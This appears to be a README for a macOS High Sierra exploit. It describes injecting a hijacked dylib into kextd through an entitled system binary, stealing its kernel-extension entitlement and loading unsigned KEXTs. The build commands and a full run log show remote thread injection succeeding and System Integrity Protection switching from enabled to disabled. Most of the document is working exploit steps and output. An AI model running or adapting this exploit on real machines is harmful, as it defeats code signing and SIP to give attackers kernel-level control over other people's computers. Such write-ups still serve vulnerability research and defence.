Works only on High Sierra, and requires root privilege. It can be chained with my previous local root exploits.
symbolshascom.apple.system-task-portsentitlement thus it can get the task port ofkextdviatask_for_pid- Trigger dylib hijack to load evil payload in process
symbolsand steal the entitlement kextd/kextutil/kextloadposecom.apple.rootless.kext-secure-management, with whom the userspace can send MKext request to XNU to load KEXT- All the validation are checked in userland: code signature, root filesystem permission, User-Approved Kernel Extension Loading, KEXT staging
- Directly ask XNU to load our KEXT without code signature
First, grab the dependencies
git submodule init
git submodule updateBuild Unrootless.kext
pushd 3rd-party/Unrootless-Kext ; xcodebuild ; popdBuild kernel exploit
pushd libinj ; make ; popd; pushd kernel ; make ; popd$ sudo ./kernel/bin/exp
Password:
2019-05-13 01:11:14.826 exp[666:7308] [LightYear] taytay pid: 668
2019-05-13 01:11:14.828 exp[666:7308] [LightYear] status: 0, pid 669
2019-05-13 01:11:14.892 symbols[669:7313] [LightYear] I am in symbols
2019-05-13 01:11:14.895 symbols[669:7313] [LightYear] inject /Users/test/Downloads/1/kernel/bin/Toolchains/XcodeDefault.xctoolchain/> usr/lib/libswiftDemangle.dylib to kextd
get task port (OK)
allocate stack (OK)
remote stack 0x10714d000
allocate code (OK)
remote code 0x1041e7000
write loader code (OK)
mark code as eXecutable (OK)
mark stack as RW (OK)
write params (OK)
create remote thread (OK)
So it's gonna be forever
Then try to load any unsigned KEXT
$ csrutil status
System Integrity Protection status: enabled.
$ codesign -dvvv "./3rd-party/Unrootless-Kext/build/Release/Unrootless.kext"
./3rd-party/Unrootless-Kext/build/Release/Unrootless.kext: code object is not signed at all
$ sudo kextload 3rd-party/Unrootless-Kext/build/Release/Unrootless.kext
$ csrutil status
System Integrity Protection status: disabled.